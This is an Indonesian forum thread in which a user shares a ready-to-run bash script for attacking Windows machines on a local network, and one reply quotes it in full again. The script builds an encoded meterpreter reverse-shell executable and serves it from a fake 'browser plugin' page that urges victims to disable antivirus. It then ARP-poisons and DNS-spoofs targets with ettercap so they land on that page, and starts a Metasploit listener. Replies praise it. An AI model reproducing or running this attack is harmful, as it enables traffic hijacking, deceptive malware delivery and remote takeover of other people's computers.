Scipt Auto Exploit [Ettercap+Dnsspoofing] Metode

**gnome_selpa** · 10-31-2012, 10:56 PM

Assalamualaikum kakak-kakak semua... ??
Ane dateng lagi nih ngebikin thread baru, udah ngubek2 kesana kemari ane liat belum ada nih yang ini (kalo repost hapus aja yak).
Ane udah lama banget nyimpen nih script, tapi belum sempet nge-share (maklum belum tau bikin thread) .
sekarang kesempetan bagus buat nge-share ini script, script "bash" yang fungsinya mengexploit windows menggunakan teknik "ettercap + dnsspoofing" (mungkin udah ada yak pake manualnya).

Script ini ane kasih nama dabllink.sh, di karenakan authornya si dabllink. Makanya ane kasih nama itu. Big Grin

ok next ama codingannya :

code:

Code:
#!/bin/bash

#Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )

#Created By Dabllink

#save this file @ root

#Thanks to :

#p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew....

#special thanks to : brother Blusp10it & Red-Dragon..

clear

apt-get install figlet

clear

echo "================================================="

figlet Dabllink

echo "================================================="

echo

echo -en "input ip anda : "

read ip

echo

echo -en "input port anda: "

read port

echo

echo "Tunggu , sedang proses (backdooring)....."

msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe

clear

panggilmsfcli() {

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E

}

gnome() {

echo '#!/bin/bash

cetaklagi() {

echo " dns spoofing :)"

echo

echo -en " input interfaces anda : "

read interfaces

echo -en " apa anda sudah punya target ? (y/n) "

read pilihan

if [ $pilihan == "y" ]; then

echo -en " input ip korban : "

read ipkorban

echo -en " input ip gateway : "

read ipgateway

ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/

elif [ $pilihan == "n" ]; then

ettercap -Tqi $interfaces -P dns_spoof -M arp // //

else

cetaklagi

fi

exec bash

}

cetaklagi' > /root/spoof.sh

clear

echo "Sedang membuka terminal baru"

sleep 2

chmod +x spoof.sh

gnome-terminal --command="./spoof.sh"

echo "exploit............................................ "

panggilmsfcli

}

kde() {

echo '#!/bin/bash

cetaklagi() {

echo " dns spoofing :)"

echo

echo -en " input interfaces anda : "

read interfaces

echo -en " apa anda sudah punya target ? (y/n) "

read pilihan

if [ $pilihan == "y" ]; then

echo -en " input ip korban : "

read ipkorban

echo -en " input ip gateway : "

read ipgateway

ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/

elif [ $pilihan == "n" ]; then

ettercap -Tqi $interfaces -P dns_spoof -M arp // //

else

cetaklagi

fi

exec bash

}

cetaklagi' > /root/spoof.sh

clear

echo "Sedang membuka terminal baru"

sleep 2

chmod +x spoof.sh

konsole --noclose -e ./spoof.sh

echo "exploit............................................ "

panggilmsfcli

}

clear

/etc/init.d/apache2 start

clear

rm /var/www/index.html

echo '<html>

<head>

<title>Browser Plugins !!!</title>

</head>

<body>

<p align="center" class="style2"><u><b>Perhatian! </u></b>install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan <b>seperti antivirus</b></p>

<p align="center">

<input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html

echo "('/nc11gs.exe','download');" >> /var/www/index.html

echo 'return false;"></p>

</body>

</html>' >> /var/www/index.html

clear

cetak() {

echo "1. /usr/local/share/ettercap/etter.dns"

echo

echo "2. /usr/share/ettercap/etter.dns "

echo

echo -en "Masukan tempat etter.dns anda berada (1/2): "

read pilihan

if [ $pilihan == "1" ]; then

echo "* A $ip" > /usr/local/share/ettercap/etter.dns  

elif [ $pilihan == "2" ]; then

echo "* A $ip" > /usr/share/ettercap/etter.dns 

else

clear

cetak

fi

}

cetak

clear

echo -en "Anda menggunakan kde/gnome? "

read pilihanzz

$pilihanzz

#M02X TeaM ..

Save dan simpen di root (save & simpen apa bedanya) dengan nama file dabllink.sh (nama laen juga kagak apa2), tapi authornya jangan diganti yak. Ntar marah lo si dabllink, hehehehe...
lanjutin nih penjelasannya, "kok harus di "root" sih nyimpennya ??
ya karena dnsspoofingya di simpen di "/root/spoof.sh" . juga bisa kok disimpen di directory mana, yang menting spoof.sh tepat nyimpen didirectory mana.

contoh:
ane simpen "dabllink.sh" di directory "/pentest/framework/" , jadi otomatis spoof.sh nya ane edit menjadi "/pentest/framework/spoof.sh".

ok selamat mencoba, Smile

kalo ada virtualbox dicoba deh, kalo nggak ada pake jaringan nyata aja, hehehe.

next alias lanjut Big Grin

eh udah abis nih kayaknya pembahasan kita, ok deh buat temen-temen. Ane siap menerima yang "ijo-ijo" nya hehehehe...

Thank to dabllink (meskipun ane kagak tau orangnya).

**shift-del** · 11-01-2012, 12:53 AM

mancap om.. kalo bisa di attach aja scripnya Smile

takut ada y error, just saran Smile

**alpoah**$ · 12-11-2012, 11:17 AM

waw bash mantap dahh \m/ \m/
setuju ama bang shift-del \m/ \m/

**gnome_selpa** · 12-11-2012, 11:24 AM

(12-11-2012, 11:17 AM)alpoah Wrote: waw bash mantap dahh \m/ \m/
setuju ama bang shift-del \m/ \m/

coba di copas om,,, script nya work .. ??
Big Grin

, hehehhehehehehe.......

**cyberly** · 12-11-2012, 12:12 PM

Wew.. Nih topik pernah ane bawa di linux camp 2 kmarin... Hhiikss ettercap n dnsspoof memang ok..

**sonyrimawan** · 03-24-2013, 05:54 AM

(10-31-2012, 10:56 PM)gnome_selpa Wrote: Assalamualaikum kakak-kakak semua... ??
Ane dateng lagi nih ngebikin thread baru, udah ngubek2 kesana kemari ane liat belum ada nih yang ini (kalo repost hapus aja yak).
Ane udah lama banget nyimpen nih script, tapi belum sempet nge-share (maklum belum tau bikin thread) .
sekarang kesempetan bagus buat nge-share ini script, script "bash" yang fungsinya mengexploit windows menggunakan teknik "ettercap + dnsspoofing" (mungkin udah ada yak pake manualnya).

Script ini ane kasih nama dabllink.sh, di karenakan authornya si dabllink. Makanya ane kasih nama itu.
ok next ama codingannya :

code:

Code:
mantap om :-bd :):- #!/bin/bash #Simple Bypass Firewall ( Easy metasploit + dns spoofing etc ) #Created By Dabllink #save this file @ root #Thanks to : #p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew.... #special thanks to : brother Blusp10it & Red-Dragon.. clear apt-get install figlet clear echo "=================================================" figlet Dabllink echo "=================================================" echo echo -en "input ip anda : " read ip echo echo -en "input port anda: " read port echo echo "Tunggu , sedang proses (backdooring)....." msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe clear panggilmsfcli() { msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E } gnome() { echo '#!/bin/bash cetaklagi() { echo " dns spoofing :)" echo echo -en " input interfaces anda : " read interfaces echo -en " apa anda sudah punya target ? (y/n) " read pilihan if [ $pilihan == "y" ]; then echo -en " input ip korban : " read ipkorban echo -en " input ip gateway : " read ipgateway ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/ elif [ $pilihan == "n" ]; then ettercap -Tqi $interfaces -P dns_spoof -M arp // // else cetaklagi fi exec bash } cetaklagi' > /root/spoof.sh clear echo "Sedang membuka terminal baru" sleep 2 chmod +x spoof.sh gnome-terminal --command="./spoof.sh" echo "exploit............................................ " panggilmsfcli } kde() { echo '#!/bin/bash cetaklagi() { echo " dns spoofing :)" echo echo -en " input interfaces anda : " read interfaces echo -en " apa anda sudah punya target ? (y/n) " read pilihan if [ $pilihan == "y" ]; then echo -en " input ip korban : " read ipkorban echo -en " input ip gateway : " read ipgateway ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/ elif [ $pilihan == "n" ]; then ettercap -Tqi $interfaces -P dns_spoof -M arp // // else cetaklagi fi exec bash } cetaklagi' > /root/spoof.sh clear echo "Sedang membuka terminal baru" sleep 2 chmod +x spoof.sh konsole --noclose -e ./spoof.sh echo "exploit............................................ " panggilmsfcli } clear /etc/init.d/apache2 start clear rm /var/www/index.html echo '<html> <head> <title>Browser Plugins !!!</title> </head> <body> Perhatian! install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan seperti antivirus <input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html echo "('/nc11gs.exe','download');" >> /var/www/index.html echo 'return false;"> </body> </html>' >> /var/www/index.html clear cetak() { echo "1. /usr/local/share/ettercap/etter.dns" echo echo "2. /usr/share/ettercap/etter.dns " echo echo -en "Masukan tempat etter.dns anda berada (1/2): " read pilihan if [ $pilihan == "1" ]; then echo "* A $ip" > /usr/local/share/ettercap/etter.dns elif [ $pilihan == "2" ]; then echo "* A $ip" > /usr/share/ettercap/etter.dns else clear cetak fi } cetak clear echo -en "Anda menggunakan kde/gnome? " read pilihanzz $pilihanzz #M02X TeaM ..

Save dan simpen di root (save & simpen apa bedanya) dengan nama file dabllink.sh (nama laen juga kagak apa2), tapi authornya jangan diganti yak. Ntar marah lo si dabllink, hehehehe...
lanjutin nih penjelasannya, "kok harus di "root" sih nyimpennya ??
ya karena dnsspoofingya di simpen di "/root/spoof.sh" . juga bisa kok disimpen di directory mana, yang menting spoof.sh tepat nyimpen didirectory mana.

contoh:
ane simpen "dabllink.sh" di directory "/pentest/framework/" , jadi otomatis spoof.sh nya ane edit menjadi "/pentest/framework/spoof.sh".

ok selamat mencoba,
kalo ada virtualbox dicoba deh, kalo nggak ada pake jaringan nyata aja, hehehe.

next alias lanjut
eh udah abis nih kayaknya pembahasan kita, ok deh buat temen-temen. Ane siap menerima yang "ijo-ijo" nya hehehehe...

Thank to dabllink (meskipun ane kagak tau orangnya).

(03-24-2013, 05:54 AM)sonyrimawan Wrote:
(10-31-2012, 10:56 PM)gnome_selpa Wrote: Assalamualaikum kakak-kakak semua... ??
Ane dateng lagi nih ngebikin thread baru, udah ngubek2 kesana kemari ane liat belum ada nih yang ini (kalo repost hapus aja yak).
Ane udah lama banget nyimpen nih script, tapi belum sempet nge-share (maklum belum tau bikin thread) .
sekarang kesempetan bagus buat nge-share ini script, script "bash" yang fungsinya mengexploit windows menggunakan teknik "ettercap + dnsspoofing" (mungkin udah ada yak pake manualnya).

Script ini ane kasih nama dabllink.sh, di karenakan authornya si dabllink. Makanya ane kasih nama itu.
ok next ama codingannya :

code:

Code:
mantap om :-bd :):- #!/bin/bash #Simple Bypass Firewall ( Easy metasploit + dns spoofing etc ) #Created By Dabllink #save this file @ root #Thanks to : #p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew.... #special thanks to : brother Blusp10it & Red-Dragon.. clear apt-get install figlet clear echo "=================================================" figlet Dabllink echo "=================================================" echo echo -en "input ip anda : " read ip echo echo -en "input port anda: " read port echo echo "Tunggu , sedang proses (backdooring)....." msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe clear panggilmsfcli() { msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E } gnome() { echo '#!/bin/bash cetaklagi() { echo " dns spoofing :)" echo echo -en " input interfaces anda : " read interfaces echo -en " apa anda sudah punya target ? (y/n) " read pilihan if [ $pilihan == "y" ]; then echo -en " input ip korban : " read ipkorban echo -en " input ip gateway : " read ipgateway ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/ elif [ $pilihan == "n" ]; then ettercap -Tqi $interfaces -P dns_spoof -M arp // // else cetaklagi fi exec bash } cetaklagi' > /root/spoof.sh clear echo "Sedang membuka terminal baru" sleep 2 chmod +x spoof.sh gnome-terminal --command="./spoof.sh" echo "exploit............................................ " panggilmsfcli } kde() { echo '#!/bin/bash cetaklagi() { echo " dns spoofing :)" echo echo -en " input interfaces anda : " read interfaces echo -en " apa anda sudah punya target ? (y/n) " read pilihan if [ $pilihan == "y" ]; then echo -en " input ip korban : " read ipkorban echo -en " input ip gateway : " read ipgateway ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/ elif [ $pilihan == "n" ]; then ettercap -Tqi $interfaces -P dns_spoof -M arp // // else cetaklagi fi exec bash } cetaklagi' > /root/spoof.sh clear echo "Sedang membuka terminal baru" sleep 2 chmod +x spoof.sh konsole --noclose -e ./spoof.sh echo "exploit............................................ " panggilmsfcli } clear /etc/init.d/apache2 start clear rm /var/www/index.html echo '<html> <head> <title>Browser Plugins !!!</title> </head> <body> Perhatian! install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan seperti antivirus <input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html echo "('/nc11gs.exe','download');" >> /var/www/index.html echo 'return false;"> </body> </html>' >> /var/www/index.html clear cetak() { echo "1. /usr/local/share/ettercap/etter.dns" echo echo "2. /usr/share/ettercap/etter.dns " echo echo -en "Masukan tempat etter.dns anda berada (1/2): " read pilihan if [ $pilihan == "1" ]; then echo "* A $ip" > /usr/local/share/ettercap/etter.dns elif [ $pilihan == "2" ]; then echo "* A $ip" > /usr/share/ettercap/etter.dns else clear cetak fi } cetak clear echo -en "Anda menggunakan kde/gnome? " read pilihanzz $pilihanzz #M02X TeaM ..

Save dan simpen di root (save & simpen apa bedanya) dengan nama file dabllink.sh (nama laen juga kagak apa2), tapi authornya jangan diganti yak. Ntar marah lo si dabllink, hehehehe...
lanjutin nih penjelasannya, "kok harus di "root" sih nyimpennya ??
ya karena dnsspoofingya di simpen di "/root/spoof.sh" . juga bisa kok disimpen di directory mana, yang menting spoof.sh tepat nyimpen didirectory mana.

contoh:
ane simpen "dabllink.sh" di directory "/pentest/framework/" , jadi otomatis spoof.sh nya ane edit menjadi "/pentest/framework/spoof.sh".

ok selamat mencoba,
kalo ada virtualbox dicoba deh, kalo nggak ada pake jaringan nyata aja, hehehe.

next alias lanjut
eh udah abis nih kayaknya pembahasan kita, ok deh buat temen-temen. Ane siap menerima yang "ijo-ijo" nya hehehehe...

Thank to dabllink (meskipun ane kagak tau orangnya).

mantap om

:- :-bd
maaf tadi salah tempat ngomentnya =))

iKONspirasi · 03-24-2013, 06:29 AM

thx bro udh share disini, +1 dari ane

btw auto skripnya ini mirip dengan yg ada di SET cara kerjanya

**gnome_selpa** · 03-24-2013, 11:03 PM

(03-24-2013, 06:29 AM)iKONspirasi Wrote: thx bro udh share disini, +1 dari ane

btw auto skripnya ini mirip dengan yg ada di SET cara kerjanya

Yaps benar om , cuman mirip tapi beda Big Grin

huakakakakakaka Tongue

btw thanks ya om cendol sagunya :-bd

**[H2]** · 03-24-2013, 11:23 PM

thanks om, jadi lebih bisa menghemat waktu pakai script ini kalau mau exploit windows :=))

**xsan-lahci** · 03-24-2013, 11:31 PM

om zee pernah bikin tool begini Big Grin

search aja egharts

btw kok error ya? copas dr TS di atas nih om

xsan-lahci@bt:~# ./dablink.sh
./dablink.sh: line 4: syntax error near unexpected token `('
./dablink.sh: line 4: `Bypass Firewall ( Easy metasploit + dns spoofing etc )'